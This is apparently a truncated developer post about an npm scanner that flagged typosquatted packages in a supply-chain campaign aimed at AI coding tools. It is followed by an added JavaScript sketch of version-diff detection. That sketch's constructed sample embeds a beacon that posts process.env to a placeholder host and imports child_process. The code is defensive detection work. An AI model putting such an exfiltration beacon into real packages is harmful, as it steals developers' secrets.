
My npm monitoring flagged SANDWORM_MODE packages -> looking for expert input
Socket just published their research on SANDWORM_MODE, a supply chain campaign targeting AI coding tools. I checked my logs. My scanner MUAD'DIB flagged several of these packages via temporal analysis - it compares versions and detects when dangerous primitives like child_process or https.request are suddenly added.

What my monitoring caught

| Package | Date | Severity | Finding |
|---|---|---|---|
| claud-code@0.2.0 | Feb 14 | CRITICAL | child_process added suddenly |
| cloude-code@0.2.0 | Feb 14 | CRITICAL | child_process added suddenly |
| suport-color@1.0.2 | Feb 14 | HIGH | https_request + publish_burst |
| opencraw@2026.2.15 | Feb 17 | HIGH | AST findings |
| opencraw@2026.2.16 | Feb 17 | HIGH | AST findings |

Socket published their report on February 22.

How temporal analysis works

MUAD'DIB compares package versions. If a new version suddenly adds sensitive APIs that weren't there before, it flags it. A color utility package (suport-color) has no reason to suddenly start making HTTPS requests. A typosquat of Claude Code (claud-code) adding child_proc
Continue reading on Dev.to
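The temporal analysis the post describes, as an added example that is not MUAD'DIB's code and not part of the original post: it extracts the sensitive primitives used by two consecutive versions of a package, reports anything that the new version added, and separately checks for a publish burst (several releases inside a short window, the second signal listed for suport-color). The primitive list, the severities, the regex-based extraction (a real scanner would walk the AST, as the post's "AST findings" imply) and the 3-releases-in-24-hours burst threshold are all assumptions made for this example; the two package sources and the publish timestamps are constructed.

```javascript
// Added example, not MUAD'DIB's code: a dependency-free sketch of version-to-version
// "temporal analysis" of an npm package. The primitive table, severities, regex
// extraction and burst threshold are assumptions; every input below is constructed.

const SENSITIVE = {
  child_process:   { severity: 'CRITICAL', reason: 'can spawn arbitrary processes' },
  'https.request': { severity: 'HIGH',     reason: 'outbound network call' },
  'http.request':  { severity: 'HIGH',     reason: 'outbound network call' },
  'process.env':   { severity: 'MEDIUM',   reason: 'reads environment (tokens, keys)' },
  fs:              { severity: 'MEDIUM',   reason: 'filesystem access' },
};
const RANK = { CRITICAL: 3, HIGH: 2, MEDIUM: 1, NONE: 0 };

// Collect the sensitive primitives one source file uses, as a Set of SENSITIVE keys.
// Regex-based on purpose (no parser dependency); it misses obfuscated or dynamic requires.
function extractPrimitives(source) {
  const found = new Set();
  // require('x'), require("node:x"), import ... from 'x'
  const modRe = /(?:require\(\s*['"]([^'"]+)['"]\s*\)|\bfrom\s+['"]([^'"]+)['"])/g;
  for (const m of source.matchAll(modRe)) {
    const mod = (m[1] ?? m[2]).replace(/^node:/, '');
    if (mod in SENSITIVE) found.add(mod);
  }
  // member accesses that matter regardless of how the module was bound
  for (const m of source.matchAll(/\b(https?\.request|process\.env)\b/g)) found.add(m[1]);
  return found;
}

// Compare two versions: any sensitive primitive in `next` that `prev` lacked is a
// finding. Overall severity is the highest among the added primitives.
function temporalDiff(prevSource, nextSource) {
  const before = extractPrimitives(prevSource);
  const after = extractPrimitives(nextSource);
  const findings = [...after]
    .filter((p) => !before.has(p))
    .map((p) => ({ primitive: p, ...SENSITIVE[p] }))
    .sort((a, b) => RANK[b.severity] - RANK[a.severity]);
  return { findings, severity: findings.length ? findings[0].severity : 'NONE' };
}

// Publish burst: minReleases or more releases inside one window (default 3 in 24h).
// Timestamps are ISO strings, the shape the registry's `time` field uses.
function publishBurst(publishTimes, minReleases = 3, windowMs = 24 * 3600 * 1000) {
  const t = publishTimes.map((s) => Date.parse(s)).sort((a, b) => a - b);
  for (let i = 0; i + minReleases - 1 < t.length; i++) {
    if (t[i + minReleases - 1] - t[i] <= windowMs) return true;
  }
  return false;
}

// Constructed sample: a tiny "color" helper whose next patch release grows an HTTPS
// beacon that ships process.env and a shell-out. Nothing here is real package code.
const colorV101 = `
const codes = { red: 31, green: 32 };
module.exports = (name, s) => '\\x1b[' + codes[name] + 'm' + s + '\\x1b[0m';
`;
const colorV102 = `
const codes = { red: 31, green: 32 };
const https = require('node:https');
const { execSync } = require('child_process');
const req = https.request({ host: 'example.invalid', method: 'POST' });
req.end(JSON.stringify(process.env));
module.exports = (name, s) => '\\x1b[' + codes[name] + 'm' + s + '\\x1b[0m';
`;
// Constructed: three releases in a little over two hours.
const colorPublishTimes = [
  '2026-02-14T09:00:00Z', '2026-02-14T09:40:00Z', '2026-02-14T11:15:00Z',
];

// Run both checks over the constructed sample and return the combined verdict.
function demo() {
  const diff = temporalDiff(colorV101, colorV102);
  return { ...diff, publishBurst: publishBurst(colorPublishTimes) };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(demo(), null, 2));
}
```

Running it on the constructed pair reports child_process (CRITICAL), https.request (HIGH) and process.env (MEDIUM) as newly added between 1.0.1 and 1.0.2, plus the publish burst; the same file compared against itself reports nothing, which is the property a version-diff scanner needs so that packages that have always used these APIs (a process manager, an HTTP client) are not re-flagged on every release.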



